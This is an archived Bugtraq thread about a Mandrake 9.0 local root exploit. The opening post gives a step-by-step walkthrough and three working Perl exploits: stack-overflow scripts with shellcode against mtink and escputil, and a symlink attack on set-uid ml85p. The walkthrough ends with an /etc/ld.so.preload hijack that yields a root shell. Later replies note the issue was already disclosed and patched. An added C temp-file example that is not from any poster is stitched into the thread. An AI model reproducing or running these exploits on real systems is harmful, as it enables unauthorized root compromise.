92052 2003-02-27 23:08 /261 lines/ Priv8 Security <xtc@priv8security.com>
Imported: 2003-02-27 23:08 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <3718>
Subject: Mandrake 9.0 local root exploit
------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------
Priv8 Security - www.priv8security.com
priv8mdk90.tar.gz - Mandrake 9.0 local root exploit
Based on Idefense adv.
http://www.idefense.com/advisory/01.21.03.txt
Greets to : coideloko, chroot-, xtc , M|ght, exitus,
overkill, blood_sucker, lkm, Brother
execk, printf, heap, diguin, n4rfy(nordico :ppp) and
all friends of Priv8 security.
OBS. My English sux...
------------------------------------------------------------------------------------------------------------------
Ok, our goal is to get root by exploiting ml85p, which is suid root by default on mdk 9.0.
[wsxz@localhost priv8]$ ls -l /usr/bin/ml85p
-rwsr-x--- 1 root sys 12344 Set 17 16:40 /usr/bin/ml85p*
You can see that we're gonna need group sys to run it, so first let's get it.
[wsxz@localhost priv8]$ ls -l /usr/bin/mtink
-rwxr-sr-x 1 lp sys 132600 Set 17 16:40 /usr/bin/mtink*
[wsxz@localhost priv8]$ ls -l /usr/bin/escputil
-rwxr-sr-x 1 lp sys 32088 Set 17 16:40 /usr/bin/escputil*
We have two here that are vulnerable: mtink has a stack overflow on the env var HOME, and escputil has a stack overflow too on a command line arg; for more details read the idefense adv.
So here we go....
First we get gid sys by exploiting mtink or escputil, you can choose which one you want to.
[wsxz@localhost priv8]$ id
uid=503(wsxz) gid=503(wsxz) grupos=503(wsxz)
[wsxz@localhost priv8]$ perl priv8mtink.pl
Priv8security.com Mandrake 9 mtink local sys exploit!!
usage: priv8mtink.pl offset
Using address: 0xbffffa80
sh-2.05b$ id
uid=503(wsxz) gid=3(sys) groups=503(wsxz)
And now we can exploit ml85p
1 - Writing any file on the system!!!
sh-2.05b$ perl priv8ml85p.pl /root/hi-there-Mr-root
Let write some files ok ;p
Now just press enter ;)
Wrong file format.
file position: ffffffff
sh-2.05b$
Now we check if it worked....
[root@localhost root]# pwd
/root
[root@localhost root]# ls -l hi*
-rw-rw-rw- 1 root sys 0 Fev 24 03:32 hi-there-Mr-root
2 - Getting root with it ;)
I will do the same thing as in the idefense adv, so let's do it..
sh-2.05b$ id
uid=503(wsxz) gid=3(sys) groups=503(wsxz)
sh-2.05b$ perl priv8ml85p.pl /etc/ld.so.preload
Let write some files ok ;p
Now just press enter ;)
Wrong file format.
file position: ffffffff
sh-2.05b$ ls -l /etc/ld.so.preload
-rw-rw-rw- 1 root sys 0 Feb 26 00:12 /etc/ld.so.preload
sh-2.05b$ cd /tmp
sh-2.05b$ echo 'int getuid(void) { return 0; }' > lib.c
sh-2.05b$ export PATH="/usr/bin:/usr/sbin:/sbin:/bin"
sh-2.05b$ gcc -fPIC -c /tmp/lib.c
sh-2.05b$ gcc -o /tmp/lib.so -shared /tmp/lib.o
sh-2.05b$ echo "/tmp/lib.so" > /etc/ld.so.preload
sh-2.05b$ su -
[root@localhost root]# id
uid=0(root) gid=0(root) grupos=0(root)
It worked, so take care what you'll write ok ;)
that's it.
------------------------------------------------------------------------------------------------------------------
priv8escputil.pl
------------------------------------------------------------------------------------------------------------------
#!/usr/bin/perl
######################################################
# Priv8security.com escputil local sys exploit.
#
# Tested on Mandrake 9.0 only.
# Based on http://www.idefense.com/advisory/01.21.03.txt
#
#####################################################
$shellcode =
"\x31\xc0\xb0".                      # setregid(x,x) - where x = x03 sys gid
"\x03".                              # x = x03 sys gid
"\x89\xc3\x89\xc1\xb0\x47\xcd\x80".  # end setregid()
"\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69".
"\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80";
$size = 1050;
$retaddr = 0xbffff4e0;
$nop = "\x90";
$offset = 0;
if (@ARGV == 1) {
    $offset = $ARGV[0];
}
print " Priv8security.com Mandrake 9 escputil local sys exploit!!\n";
print " usage: $0 offset\n";
# NOP sled, then the shellcode
for ($i = 0; $i < ($size - length($shellcode) - 4); $i++) {
    $buffer .= $nop;
}
$buffer .= $shellcode;
print " Using address: 0x", sprintf('%lx', ($retaddr + $offset)), "\n";
$newret = pack('l', ($retaddr + $offset));
# pad the rest of the buffer with copies of the return address
for ($i += length($shellcode); $i < $size; $i += 4) {
    $buffer .= $newret;
}
exec("/usr/bin/escputil -c -P $buffer");
------------------------------------------------------------------------------------------------------------------
priv8ml85p.pl
------------------------------------------------------------------------------------------------------------------
#!/usr/bin/perl
######################################################
# Priv8security.com ml85p local root exploit.
#
# This exploit erases any file on the system; you'll need
# group sys to do it, so run priv8mtink.pl or
# priv8escputil.pl to get it ;)
# Tested on Mandrake 9.0 only.
# Based on http://www.idefense.com/advisory/01.21.03.txt
#
#####################################################
if (@ARGV == 1) {
    $file = $ARGV[0];
    $link = "/tmp/ml85g";
    $link .= time();
    umask 000;    # inherited by ml85p, so the file it creates is world-writable
    system("ln -s $file '$link'");
    print "Lets write some files ok ;p\n";
    print "Now just press enter....\n";
    if (system("/usr/bin/ml85p -s") == -1) {
        print "You cant run ml85p, check if you have gid sys...\n";
    }
    exit(1);
} else {
    print "\n!!! Priv8security.com ml85p local root exploit by wsxz !!!\n";
    print " Usage: perl $0 file-to-overwrite\n\n";
}
------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------
priv8mtink.pl
------------------------------------------------------------------------------------------------------------------
#!/usr/bin/perl
######################################################
# Priv8security.com mtink local sys exploit.
#
# Tested on Mandrake 9.0 only.
# Based on http://www.idefense.com/advisory/01.21.03.txt
#
#####################################################
$shellcode2 =
"\x31\xc0\xb0".                      # setregid(x,x) - where x = x03 sys gid
"\x03".                              # x = x03 sys gid
"\x89\xc3\x89\xc1\xb0\x47\xcd\x80".  # end setregid()
"\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69".
"\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80";
$size = 1056;
$retaddr = 0xbffffa80;
$nop = "\x90";
$offset = 0;
if (@ARGV == 1) {
    $offset = $ARGV[0];
}
print " Priv8security.com Mandrake 9 mtink local sys exploit!!\n";
print " usage: $0 offset\n";
# NOP sled, then the shellcode
for ($i = 0; $i < ($size - length($shellcode2) - 4); $i++) {
    $buffer .= $nop;
}
$buffer .= $shellcode2;
print " Using address: 0x", sprintf('%lx', ($retaddr + $offset)), "\n";
$newret = pack('l', ($retaddr + $offset));
# pad the rest of the buffer with copies of the return address
for ($i += length($shellcode2); $i < $size; $i += 4) {
    $buffer .= $newret;
}
# the overflow is in mtink's handling of HOME
local($ENV{'HOME'}) = $buffer;
exec("/usr/bin/mtink");
------------------------------------------------------------------------------------------------------------------
(92052) /Priv8 Security <xtc@priv8security.com>/----
Comment in text 92179 by KF <dotslash@snosoft.com>
Comment in text 92253 by Vincent Danen <vdanen@mandrakesoft.com>
92179 2003-02-28 17:00 /23 lines/ KF <dotslash@snosoft.com>
Imported: 2003-02-28 17:00 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <3722>
Comment on text 92052 by Priv8 Security <xtc@priv8security.com>
Subject: Re: Mandrake 9.0 local root exploit
------------------------------------------------------------
A portion of this exploit scenario has already been disclosed in the
past. The tmp file issues in ml85p can be located at
http://www.securityfocus.com/bid/3008
Mandrake has released an advisory (MDKSA-2003:010) which contains
fixes:
The information contained below is the snippet from the iDEFENSE
advisory http://www.idefense.com/advisory/01.21.03.txt. This condition
has also already been exploited by SNOSoft with the help of Charles
Stevenson:
VULNERABILITY THREE: The ml85p binary, installed set user id root,
contains a race condition in its opening of temporary
files. Successful exploitation provides an attacker with the
ability to create or empty a file with super user privileges. The
following snippet contains the offending segment of code:
sprintf(gname,"/tmp/mlg85p%d",time(0));
if (!(cbmf = fopen(gname,"w+"))) {
-KF
(92179) /KF <dotslash@snosoft.com>/-------(rewrapped)
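The temporary-file race KF quotes above, as an added C example that is not code from ml85p, the iDEFENSE advisory or any of the posters: the predictable-name fopen("w+") pattern beside a hardened opener on the same path, plus a constructed scenario in a private scratch directory (the /tmp/ml85p-demo.XXXXXX directory, the "victim" file and the mlg85p<time> link are all assumptions of this example) showing that the first opener follows a planted symlink while the second refuses it.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <time.h>
#include <unistd.h>

/* The pattern KF quotes from ml85p: a predictable /tmp name opened with
 * fopen("w+"). fopen follows a symlink, so a link planted at that name
 * makes the set-uid process create or truncate whatever it points at. */
int open_tmp_unsafe(const char *path) {
    FILE *f = fopen(path, "w+");
    if (!f) return -1;
    fclose(f);
    return 0;
}

/* Hardened opener for the same path: O_CREAT|O_EXCL fails atomically if
 * anything (a symlink included) already exists there, O_NOFOLLOW adds a
 * second refusal, and mode 0600 keeps the file private to the process. */
int open_tmp_safe(const char *path) {
    int fd = open(path, O_RDWR | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0) return -1;
    close(fd);
    return 0;
}

/* Constructed scenario (assumed names): a private scratch directory, a
 * "victim" file with content, and a symlink at the predictable name that
 * points at it. Returns 0 on setup failure, 1 if open_tmp_unsafe truncated
 * the victim through the link, 2 if open_tmp_safe refused the planted link. */
int demo(int use_safe) {
    char dir[] = "/tmp/ml85p-demo.XXXXXX", victim[256], tmp[256];
    struct stat st;
    int result = 0;
    if (!mkdtemp(dir)) return 0;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(tmp, sizeof tmp, "%s/mlg85p%ld", dir, (long)time(NULL));
    FILE *v = fopen(victim, "w");
    if (!v || fputs("important data\n", v) == EOF || fclose(v) != 0) return 0;
    if (symlink(victim, tmp) != 0) return 0;
    if (use_safe)
        result = (open_tmp_safe(tmp) == -1) ? 2 : 0;   /* refused => 2 */
    else if (open_tmp_unsafe(tmp) == 0 && stat(victim, &st) == 0 && st.st_size == 0)
        result = 1;                                    /* victim truncated */
    unlink(tmp); unlink(victim); rmdir(dir);
    return result;
}
```

The scratch directory is created with mkdtemp (mode 0700), so the demonstration never touches anything outside it.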
92253 2003-02-28 23:58 /32 lines/ Vincent Danen <vdanen@mandrakesoft.com>
Imported: 2003-02-28 23:58 by Brevbäraren
External recipient: Priv8 Security <xtc@priv8security.com>
Recipient: Bugtraq (import) <3737>
Comment on text 92052 by Priv8 Security <xtc@priv8security.com>
Subject: Re: Mandrake 9.0 local root exploit
------------------------------------------------------------
On Thu Feb 27, 2003 at 09:43:04PM -0000, Priv8 Security wrote:
> ------------------------------------------------------------------------------------------------------------------
> Priv8 Security - www.priv8security.com
>
> priv8mdk90.tar.gz - Mandrake 9.0 local root exploit
>
> Based on Idefense adv.
> http://www.idefense.com/advisory/01.21.03.txt
>
> Greets to : coideloko, chroot-, xtc , M|ght, exitus,
> overkill, blood_sucker, lkm, Brother
> execk, printf, heap, diguin, n4rfy(nordico :ppp) and
> all friends of Priv8 security.
>
> OBS. My english sux...
> ------------------------------------------------------------------------------------------------------------------
>
> Ok, our goal is to get root by exploiting ml85p thats
> suid root by default on mdk 9.0
What Priv8 Security neglected to mention in their advisory is that a
fix has been available since January 21st; the advisory is available
here:
http://www.mandrakesecure.net/en/advisories/advisory.php?name=MDKSA-2003:010
--
MandrakeSoft Security; http://www.mandrakesecure.net/
Online Security Resource Book; http://linsec.ca/
"lynx -source http://linsec.ca/vdanen.asc | gpg --import"
{FE6F2AFD : 88D8 0D23 8D4B 3407 5BD7 66F9 2043 D0E5 FE6F 2AFD}
(92253) /Vincent Danen <vdanen@mandrakesoft.com>/(rewrapped)
Attachment (application/pgp-signature) in text 92254
92254 2003-02-28 23:58 /8 lines/ Vincent Danen <vdanen@mandrakesoft.com>
Imported: 2003-02-28 23:58 by Brevbäraren
External recipient: Priv8 Security <xtc@priv8security.com>
Recipient: Bugtraq (import) <3738>
Attachment (text/plain) to text 92253
Subject: Attachment to: Re: Mandrake 9.0 local root exploit
------------------------------------------------------------
(92254) /Vincent Danen <vdanen@mandrakesoft.com>/---